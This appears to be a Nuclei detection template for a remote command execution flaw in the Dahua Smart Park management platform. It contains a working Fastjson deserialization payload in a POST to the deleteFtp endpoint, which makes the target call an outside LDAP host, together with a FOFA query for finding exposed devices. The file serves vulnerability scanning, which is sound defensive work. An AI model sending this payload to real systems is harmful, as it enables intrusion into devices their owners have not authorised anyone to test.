id: dahua-wpms-rce

info:
  name: Dahua Smart Park Integrated Management Platform - Remote Command Execution
  author: DhiyaneshDK
  severity: critical
  description: Dahua Smart Park Integrated Management Platform is vulnerable to RCE.
  reference:
    - https://github.com/Vme18000yuan/FreePOC/blob/master/poc/pocsuite/dahua-zhyq-deleteftp-rce.py
  metadata:
    max-request: 1
    fofa-query: body="src=\"/WPMS/asset/common/js/jsencrypt.min.js\""
  tags: rce,dahua,wpms

http:
  - raw:
      - |
        POST /CardSolution/card/accessControl/swingCardRecord/deleteFtp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"ftpUrl":{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://{{interactsh-url}}","autoCommit":true}}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "autoCommit"
          - "set property error"
        condition: and

      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
# digest: 4a0a00473045022100e4bb33b8973004bb52ae15766532b5fdb0eaddfac27e7efb8d292f3b9f496f8502207c20c47cf5743dc2a3b3e26c942d5666a2786a2734ff61a1ce80e1ff61aff39c:922c64590222798bb761d5b6d8e72950